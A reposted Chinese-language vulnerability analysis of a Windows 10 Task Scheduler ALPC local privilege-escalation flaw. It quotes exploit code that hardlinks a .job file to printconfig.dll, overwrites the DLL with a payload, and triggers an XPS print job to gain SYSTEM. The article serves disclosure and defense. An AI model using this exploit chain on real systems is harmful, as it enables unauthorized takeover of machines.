文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

win10本地提权0day预警实例分析

2023-06-19 12:13

关注

这篇文章跟大家分析一下“win10本地提权0day预警实例分析”。内容详细易懂,对“win10本地提权0day预警实例分析”感兴趣的朋友可以跟着小编的思路慢慢深入来阅读一下,希望阅读后能够对大家有所帮助。下面跟着小编一起深入学习“win10本地提权0day预警实例分析”的知识吧。

0x00 漏洞背景

win10中任务调度服务导出的函数没有验证调用者的权限,任意权限的用户调用该函数可以获取系统敏感文件的写权限,进而提权。

0x01 漏洞影响

漏洞影响win10和windows server 2016。目前发布的EXP暂时只能用于x64系统。

0x02 漏洞详情

win10系统Task Scheduler任务调度服务中ALPC调用接口导出了SchRpcSetSecurity函数,该函数能够对一个任务或者文件夹设置安全描述符。

 HRESULT SchRpcSetSecurity(
  [in, string] const wchar_t* path,
  [in, string] const wchar_t* sddl,
  [in] DWORD flags
);

该服务是通过svchost的服务组netsvcs所启动的,对应的dll是schedsvc.dll。

win10本地提权0day预警实例分析

win10本地提权0day预警实例分析

win10本地提权0day预警实例分析

在xp系统中,任务存放在C:\Windows\Tasks目录,后缀为.job;而win7及以后的版本任务以xml的格式存放在C:\Windows\System32\Tasks目录。

win10本地提权0day预警实例分析

可能是为了兼容的考虑,SchRpcSetSecurity函数在win10中仍然会检测C:\Windows\Tasks目录下是否存在后缀为.job的文件,如果存在则会写入DACL数据。如果将job文件硬链接到特定的dll那么特定的dll就会被写入DACL数据,本来普通用户对特定的dll只具有读权限,这样就具有了写权限,接下来向dll写入漏洞利用代码并启动相应的程序就获得了提权。

那么首先需要找到一个普通用户具有读权限而系统具有写入DACL权限的dll,EXP中用的是C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll,然后将C:\Windows\Tasks\UpdateTask.job硬链接到这个dll。

    WIN32_FIND_DATA FindFileData;
   HANDLE hFind;
   hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData);
   wchar_t BeginPath[MAX_PATH] = L"c:\\windows\\system32\\DriverStore\\FileRepository\\";
   wchar_t PrinterDriverFolder[MAX_PATH];
   wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
   wmemcpy(PrinterDriverFolder, FindFileData.cFileName, wcslen(FindFileData.cFileName));
   FindClose(hFind);
   wcscat(BeginPath, PrinterDriverFolder);
   wcscat(BeginPath, EndPath);

   //Create a hardlink with UpdateTask.job to our target, this is the file the task scheduler will write the DACL of
   CreateNativeHardlink(L"c:\\windows\\tasks\\UpdateTask.job", BeginPath);

在调用SchRpcSetSecurity函数使普通用户成功获取了对该dll写入的权限之后写入资源文件中的exploit.dll。

    //Must be name of final DLL.. might be better ways to grab the handle
   HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE");

   //Payload is included as a resource, you need to modify this resource accordingly.
   HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
   unsigned int myResourceSize = ::SizeofResource(mod, myResource);
   HGLOBAL myResourceData = ::LoadResource(mod, myResource);
   void* pMyBinaryData = ::LockResource(myResourceData);

   //We try to open the DLL in a loop, it could already be loaded somewhere.. if thats the case, it will throw a sharing violation and we should not continue
   HANDLE hFile;
   DWORD dwBytesWritten = 0;
   do {
       hFile = CreateFile(BeginPath,GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);                  
       WriteFile(hFile,(char*)pMyBinaryData,myResourceSize,&dwBytesWritten,NULL);          
       if (hFile == INVALID_HANDLE_VALUE)
       {
           Sleep(5000);
       }
   } while (hFile == INVALID_HANDLE_VALUE);
   CloseHandle(hFile);

printconfig.dll和系统打印相关,并且没有被print spooler服务默认启动。所以随后调用StartXpsPrintJob开始一个XPS打印。

    //After writing PrintConfig.dll we start an XpsPrintJob to load the dll into the print spooler service.
   CoInitialize(nullptr);
   IXpsOMObjectFactory *xpsFactory = NULL;
   CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER, __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
   HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
   IXpsPrintJob *job = NULL;
   IXpsPrintJobStream *jobStream = NULL;
   StartXpsPrintJob(L"Microsoft XPS Document Writer", L"Print Job 1", NULL, NULL, completionEvent, NULL, 0, &job, &jobStream, NULL);
   jobStream->Close();
   CoUninitialize();
   return 0;

整个漏洞利用程序编译出来是个dll,把它注入到notepad中运行,发现spoolsv.exe创建的notepad已经具有SYSTEM权限,而系统中的printconfig.dll也被修改成了资源文件中的exploit.dll。

win10本地提权0day预警实例分析

win10本地提权0day预警实例分析

0x03 防御措施

建议用户安装360安全卫士等终端防御软件拦截利用此类漏洞的攻击,不要打开来源不明的程序。

关于win10本地提权0day预警实例分析就分享到这里啦,希望上述内容能够让大家有所提升。如果想要学习更多知识,请大家多多留意小编的更新。谢谢大家关注一下编程网网站!

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-人工智能
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯